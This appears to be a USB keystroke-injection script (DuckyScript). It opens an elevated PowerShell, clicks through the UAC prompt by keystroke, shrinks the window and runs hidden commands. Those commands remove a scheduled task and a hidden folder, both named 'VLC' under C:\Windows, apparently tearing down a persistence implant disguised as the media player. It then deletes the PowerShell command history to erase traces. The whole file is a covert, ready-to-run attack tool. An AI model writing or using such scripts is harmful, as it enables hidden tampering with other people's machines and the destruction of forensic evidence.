DELAY 1000
GUI r
DELAY 1000
STRING PowerShell Start-Process -Verb runAs PowerShell
ENTER
DELAY 5000
ALT y
ALT t
DELAY 5000
REM Resize PowerShell window
STRING mode con cols=20 lines=1
ENTER
REM Run payload in hidden window
STRING Start-Process -WindowStyle Hidden PowerShell "
REM Payload
STRING cd C:\Windows\VLC
STRING Stop-ScheduledTask -TaskName "VLC"
STRING Unregister-ScheduledTask -TaskName VLC -Confirm:$false
STRING attrib -s -h .
STRING cd ..
STRING Remove-Item -recurse -force VLC
STRING ";(Get-PSReadlineOption).HistorySavePath | rm;exit
ENTER
